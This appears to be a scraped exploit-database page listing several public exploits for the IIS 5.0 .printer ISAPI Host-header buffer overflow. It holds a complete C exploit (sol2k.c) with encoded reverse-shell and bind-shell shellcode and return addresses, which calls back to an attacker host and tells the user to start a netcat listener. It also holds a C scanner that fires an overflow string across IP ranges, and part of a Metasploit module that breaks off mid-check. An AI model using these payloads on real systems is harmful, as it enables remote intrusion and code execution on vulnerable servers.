print @results;

sub sendexplt {
        my ($pstr)=@_; 
	$target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              
		$|=1;
                print $pstr;            
		my @in=<S>;
   	        select(STDOUT);
	        close(S);
                return @in;
        } else { die("Can't connect...\n"); }
}
		

- 漏洞信息 (20816)

Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2) (EDBID:20816)
windows remote
2001-05-01 Verified
0 dark spyrit
N/A [点击下载]
source: http://www.securityfocus.com/bid/2674/info
 
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
 
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 

*/
//---------------------------sol2k.c--------------------------------
#ifdef _WIN32
#include <Winsock2.h>
#include <Windows.h>
#include <stdlib.h>
#include <string.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>
#include <string.h>
#include <fcntl.h>

unsigned long *ret[20];
unsigned char send_buf[2000];
unsigned char request[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a";
unsigned char revers_shell[]=
"\x42\x65\x61\x76\x75\x68\x3a\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a";
//FlashSky/Benjurry and, H D Moore's code
unsigned char shell[]=
"\x42\x65\x61\x76\x75\x68\x3a\x20\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x0d\x0a";
unsigned char overflow[]=
"\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x41\x41\x41\x41\x0d\x0a\x0d\x0a";
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
        int z=0;
        int                     s;
        unsigned short int      a_port;
        unsigned long           a_host;
        struct hostent          *ht;
        struct sockaddr_in      sin;
        #ifdef _WIN32
        WORD werd;
        WSADATA wsd;

        #endif
int main(int argc, char *argv[]){
//call ebx values in msw3prt.dll
ret[0] = 0x6A8C3105;
ret[1] = 0x6A8C317F;
ret[2] = 0x6A8C3267;
ret[3] = 0x6A8C32AD;
ret[4] = 0x6A8C3DB9;
ret[5] = 0x6A8C3DC2;
ret[6] = 0x6A8C3E23;
ret[7] = 0x6A8C4D88;
ret[8] = 0x6A8C4DD1;
ret[9] = 0x6A8C4DFB;
ret[10] = 0x6A8C5383;
ret[11] = 0x6A8C5395;
ret[12] = 0x6A8C565D;
ret[13] = 0x6A8C6437;
ret[14] = 0x6A8C6451;
ret[15] = 0x6A8C66C2;
ret[16] = 0x6A8C66FB;
ret[17] = 0x6A8C6B04;
ret[18] = 0x6A8C6B1D;
ret[19] = 0x6A8C73A4;
ret[20] = 0x6A8C73D8;
ret[21] = 0x6A8C73F4;
ret[22] = 0x6A8C9C55;
ret[23] = 0x6A8C9C86;
ret[24] = 0x6A8CCF13;
ret[25] = 0x6A8CCF4B;
ret[26] = 0x6A8CCF62;
        #ifdef _WIN32
        werd= MAKEWORD(2,0);
        WSAStartup(werd,&wsd);
        #endif
        printf("iis5 remote .printer overflow.\n"
                "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n"
                "Updated by sectroyer the member of Random Intruders\n");

if (argc < 3){
        printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]);
        exit(1);
         }
if (argc >= 3){
        if(!atoi(argv[1]) && argc < 6)
        {
        printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]);
        exit(1);
        }
        else if(atoi(argv[1])==1 && argc<3)
        {
        printf("usage: %s 0 <vicHost> <vicPort> <atckHost> <atckPort> [<ret 1-26>]\nOr: %s 1 <vicHost> [<shellPort>] [<vicPort>] [<ret 1-26>]\n",argv[0],argv[0]);
        exit(1);
        }
        }
        if(!atoi(argv[1]))
        {
        if(argc>6 && atoi(argv[6])<27 && atoi(argv[6])>-1)
          *(unsigned long *)&overflow[358]=ret[atoi(argv[6])];
        else
          *(unsigned long *)&overflow[358]=ret[0];
        memcpy(&send_buf,&request,strlen(request));
        memcpy(&send_buf[strlen(request)],&revers_shell,strlen(revers_shell));
        memcpy(&send_buf[strlen(request)+strlen(revers_shell)],&overflow,strlen(overflow));

        printf("You need to you need to set up a netcat listener on the host you control.\nEx: nc -l -p %s -vv\n",argv[5]);

        if ((ht = gethostbyname(argv[2])) == 0){
                printf("%s",argv[2]);
                exit(1);
        }
        sin.sin_port = htons(atoi(argv[3]));
        a_port = htons(atoi(argv[5]));
        a_port^=0x9595;

        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);

        if ((ht = gethostbyname(argv[4])) == 0){
                printf("%s",argv[4]);
                exit(1);
        }

        a_host = *((unsigned long *)ht->h_addr);
        a_host^=0x95959595;

        send_buf[441]= (a_port) & 0xff;
        send_buf[442]= (a_port >> 8) & 0xff;

        send_buf[446]= (a_host) & 0xff;
        send_buf[447]= (a_host >> 8) & 0xff;
        send_buf[448]= (a_host >> 16) & 0xff;
        send_buf[449]= (a_host >> 24) & 0xff;
        }
        else if(atoi(argv[1])==1)
        {
        if(argc>3)
           printf("Use Netcat to connect to %s:%s\n", argv[2],argv[3]);
        else
           printf("Use Netcat to connect to %s:4444\n", argv[2]);
        if(argc>5 && atoi(argv[5])<27 && atoi(argv[5])>-1)
          *(unsigned long *)&overflow[358]=ret[atoi(argv[5])];
        else
          *(unsigned long *)&overflow[358]=ret[0];

        if(argc>3 && atoi(argv[3])>0)
        {
           lportl=atoi(argv[3]);
           lportl=htons(lportl);
           memcpy(&lport[1], &lportl, 2);
           *(long*)lport = *(long*)lport ^ 0x9432BF80;
           memcpy(&shell[279],&lport,4);
        }
        memcpy(&send_buf,&request,strlen(request));
        memcpy(&send_buf[strlen(request)],&shell,strlen(shell));
        memcpy(&send_buf[strlen(request)+strlen(shell)],&overflow,strlen(overflow));

        if ((ht = gethostbyname(argv[2])) == 0){
                printf("%s",argv[2]);
                exit(1);
        }
        if(argc>4 && atoi(argv[4])>0)
        {
            sin.sin_port = htons(atoi(argv[4]));
        }
        else
            sin.sin_port = htons(80);
        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);
        }
        if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                perror("socket");
                exit(1);
        }

        printf("\nconnecting... \n");

        if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
                perror("connect");
                exit(1);
        }

        send(s, send_buf, strlen(send_buf),0);
        sleep (1);
        #ifdef _WIN32
        closesocket(s);
        #else
        close(s);
        #endif
        if(!z)
          printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
        else
          printf("sent...\n");
        exit(0);
}

		

- 漏洞信息 (20817)

Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3) (EDBID:20817)
windows remote
2005-02-02 Verified
0 styx
N/A [点击下载]
source: http://www.securityfocus.com/bid/2674/info
  
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
  
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 

/*
   Author:  styx^

   Source:  Iis Isapi Vulnerabilities Checker v 1.0

   License: GPL
            This program is free software; you can redistribute it and/or
            modify it under the terms of the GNU General Public License
            as published by the Free Software Foundation; either version 2
            of the License, or (at your option) any later version.

   Email:   Write me for any problem or suggestion at: the.styx@gmail.com

   Date:    02/02/2005

   Read me: Just compile it with:

            Compile: gcc iivc.c -o iivc
            Use: ./iivc <initial_ip> <final_ip> [facultative(log_file)]
            Example: ./iivc 127.0.0.1 127.0.0.4 scan.log


            PAY ATTENTION: This source is coded for only personal use on
            your own iis servers. Don't hack around.

            Special thanks very much:
            To overIP (he's my master :)
            To hacklab crew (www.hacklab.tk)

   Bug:     This checker scans a range of ip and checks the iis 5.0/1
            sp1/2 .printer ISAPI extension buffer overflow
            vulnerability. If we send to a server about
            420 bytes,we can do a buffer overflow.Find for more
            specifications of this vulnerability in
            www.securityfocus.com or bugtraq. Enjoy your self! :)

            (I've been ispired (but just this :) from perl storm@stormdev.net's
            checker).

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>

#define PORTA 80


int i = 0, j = 0, k = 0, l = 0;
int a = 0, b = 0, c = 0, d = 0;
int z = 0;
FILE *f;


int result(int );
void scan(char *);
void separe(char *, char *);
void write_file(char *);
void author();


int main(int argn, char *argv[]) {

        char initip[16], finip[16];
        struct tm *t;
        char *sep = "+-------------------------------------------------------+\n\n\n";
        time_t s, iniz, fini;

        memset(initip, 0x0, 16);
        memset(finip, 0x0, 16);


        if ( argn < 4 ) {

                author();
                printf("\n\nUse: %s <initial_ip> <final_ip> <log_file>\n", argv[0]);
                printf("\nExample.\n%s 127.0.0.1 127.0.0.4 scan.log\n\n\n", argv[0]);
                exit(0);
        }

        time(&iniz);

        if((f = fopen(argv[3], "a")) == NULL) {
                printf("Error occured when I try to open file %s\n", argv[3]);
        }

        z++;
        printf("\nNow the checker will write the result of scan in %s in your local directory..\n\n", argv[3]);
        write_file("+-------------------------------------------------------+\n| ");
        s = time(NULL);
        write_file(asctime(localtime(&s)));
        write_file("+-------------------------------------------------------+\n|\n");
        sleep(1);


        author();
        sleep(2);
        separe(argv[1],argv[2]);

        sprintf(finip,"%d.%d.%d.%d",a,b,c,d);

        while(1) {

                sprintf(initip, "%d.%d.%d.%d", i, j, k, l);
                printf("\n\n\nI'm connecting to: %s\n", initip);

                scan(initip);

                if ( strcmp(initip, finip) == 0) {
                write_file("|");
                break;
                }

                l++;

                if ( l == 256) {
                        l = 0;
                        k++;
                        if ( k == 256) {
                                k = 0;
                                j++;
                                        if (j == 256) {
                                                j = 0;
                                                i++;
                                        }
                        }
                }


        }

        time(&fini);

        printf("\n*************************\n");

        printf("\nSCAN FINISHED! in %d sec\n\n", fini - iniz);

        if( z > 0 ) {

                printf("You can view the file %s to see quietly scan's results..\n\n", argv[3]);
                fprintf(f, "\n%s\n", sep);

        }

        return 0;
        fclose(f);

}


void separe(char *ip,char *ip2) {

        char *t = '\0';
        int f = 0;

        t = strtok(ip,".");
        i = atoi(t);

        while( t != NULL) {

                t = strtok(NULL, ".");
                f++;
                if ( f == 1) j = atoi(t);
                else if (f == 2) k = atoi(t);
                else if (f == 3) l = atoi(t);

        }

        t = '\0';
        f = 0;

        t = strtok(ip2,".");
        a = atoi(t);

        while( t != NULL) {

                t = strtok(NULL, ".");
                f++;
                if ( f == 1) b = atoi(t);
                else if (f == 2) c = atoi(t);
                else if (f == 3) d = atoi(t);

                }

        return;

}


void scan(char *ip) {

        int sock, risp;
        struct sockaddr_in web;
        char buf[50];
        int i = 0;

        if( (sock = socket(AF_INET,SOCK_STREAM,0)) < 0 ) {

                printf("Error occured when I try to create socket\n");
                perror("sock:");

        }

        web.sin_family = AF_INET;
        web.sin_port = htons(PORTA);
        web.sin_addr.s_addr = inet_addr(ip);

        if( connect(sock, (struct sockaddr *)&web, sizeof(web)) < 0 ) {

                printf("I can't connect to %s..is it online?\n", ip);
                perror("connect: ");

        }

        printf("Ok..I'm sending the string...");

        risp = result(sock);

        if( risp == 0 ) {

                printf("The server %s is vulnerable...i think that you have to install a patch! :)\n\n", ip);

                if ( z > 0 ) {

                        sprintf(buf, "| The server %s is vulnerable.!\n", ip);
                        write_file(buf);

                        for( i = 0; i < 50; i++ ) {
                                buf[i] = '\0';
                        }
                }

        } else {

                printf("I'm sorry: the server %s is not vulnerable..change target\n", ip);

                if ( z > 0 ) {

                        sprintf(buf, "| I'm sorry:the server %s is not vulnerable.\n", ip);
                        write_file(buf);

                        for( i = 0; i < 50; i++ ) {
                                buf[i] = '\0';
                        }
                }
        }

        sleep(1);
        close(sock);
        return;

}


int result(int sock) {

        char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n";
        char buf[1024];
        int i = 0;

        for ( i = 0; i< 1024; i++) {
                buf[i] = '\0';
        }

        if( write(sock, expl, strlen(expl)) == -1) {

                printf("Error occured when I try to send exploit...\n");
                perror("write: ");
        }

        if( read(sock, buf, sizeof(buf)) == -1) {

                printf("Error occured when I try to read from sock...\n");
                perror("read: ");

        }

        if( buf == NULL) {
                return 0;
        } else {

        return -1;

        }
}

void write_file(char *buf) {

        fprintf(f, "%s", buf);

        return;

}

void author() {

printf("\n\n\n");
printf("+--------------------------------------------+\n");
printf("|                                            |\n");
printf("|             styx^ checker for              |\n");
printf("|   IIS 5.0 sp1 sp2 ISAPI Buffer Overflows   |\n");
printf("|                                            |\n");
printf("+--------------------------------------------+\n\n");

}

		

- 漏洞信息 (20818)

Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4) (EDBID:20818)
windows remote
2001-05-01 Verified
0 Cyrus The Great
N/A [点击下载]
source: http://www.securityfocus.com/bid/2674/info
  
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
  
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 

http://www.exploit-db.com/sploits/20818.zip		

- 漏洞信息 (F82923)

Microsoft IIS 5.0 Printer Host Header Overflow (PacketStormID:F82923)
2009-10-30 00:00:00
H D Moore  metasploit.com
exploit,overflow,protocol
windows,2k
CVE-2001-0241
[点击下载]

This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This Metasploit module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS 5.0 Printer Host Header Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in the request processor of
				the Internet Printing Protocol ISAPI module in IIS. This
				module works against Windows 2000 service pack 0 and 1. If
				the service stops responding after a successful compromise,
				run the exploit a couple more times to completely kill the
				hung process.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2001-0241'],
					[ 'OSVDB', '3323'],
					[ 'BID', '2674'],
					[ 'MSB', 'MS01-023'],
					[ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 900,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,

				},
			'Targets'        => 
				[
					[ 
						'Windows 2000 English SP0-SP1', 
						{
							'Platform' => 'win',
							'Ret'      => 0x732c45f3,
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'May 1 2001',
			'DefaultTarget' => 0))
			
		register_options(
			[
				Opt::RPORT(80)
			], self.class)			
	end


	def check
		connect
		sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect
		
		if !(resp and resp =~ /Error in web printer/)
			return Exploit::CheckCode::Safe
		end
		
		connect
		sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n")
		resp = sock.get_once
		disconnect
		
		if (resp and resp =~ /locked out/) 
			print_status("The IUSER account is locked out, we can't check")
			return Exploit::CheckCode::Detected
		end
		
		if (resp and resp.index("HTTP/1.1 500") >= 0)
